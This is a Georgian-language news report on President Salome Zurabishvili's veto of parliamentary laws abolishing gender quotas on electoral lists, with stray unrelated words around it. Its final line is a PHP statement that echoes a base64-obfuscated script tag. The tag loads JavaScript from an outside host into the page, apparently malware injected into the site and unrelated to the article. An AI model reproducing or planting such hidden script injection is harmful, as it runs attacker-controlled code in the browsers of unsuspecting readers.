celsiusi
ავერსი საქკაბელი

 საქართველოს პრეზიდენტის ადმინისტრაციის ინფორმაციით, სალომე ზურაბიშვილმა ვეტო დაადო პარლამენტის მიერ მიღებულ ყველა იმ კანონს, რომელიც ქალთა კვოტირების გაუქმებას ითვალისწინებს. გავრცელებულ განცხადებაში ნათქვამია, რომ აღნიშნული კანონები წინააღმდეგობაში მოდის საქართველოს ევროინტეგრაციასთან.

"საქართველოს პრეზიდენტმა ვეტო დაადო პარლამენტის მიერ მიღებულ კანონებს, რომელიც ქალთა კვოტირების გაუქმებას ითვალისწინებს.

როგორც საქართველოს პრეზიდენტმა არაერთხელ აღნიშნა, იგი ვეტოს დაადებს ყველა კანონს, რომელიც წინააღმდეგობაში მოვა საქართველოს ევროპულ გზასთან. გენდერული კვოტირების გაუქმება საქართველოს ევროინტეგრაციის გზაზე კიდევ ერთი უკან გადადგმული ნაბიჯია, რადგან გენდერული კვოტების საკითხი ევროკომისიის მიერ დაწესებული 12 პუნქტიანი გეგმის მე-9 პუნქტის შემადგენელი ნაწილი იყო, რომელიც ევროკომისიამ შესრულებულად ჩათვალა", - ნათქვამია პრეზიდენტის ადმინისტრაციის განცხადებაში.

ცნობისთვის, თვის დასაწყისში პარტია „გირჩი“ საარჩევნო სიების ფორმირების პროცესში გენდერული კვოტირების ვალდებულების გაუქმების ინიციატივით გამოვიდა. ინიციატივას მხარი დაუჭირა საპარლამენტო უმრავლესობამაც, რის სანაცვლოდაც ელოდება, რომ ცესკო-ს თავმჯდომარის არჩევისას "გირჩი" "ქართული ოცნების" სასურველ კანდიდატს დაუჭერს მხარს. საარჩევნო კოდექსში ცვლილებები დაჩქარებული წესით, მესამე მოსმენით, 4 აპრილს დამტკიცდა.

174
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");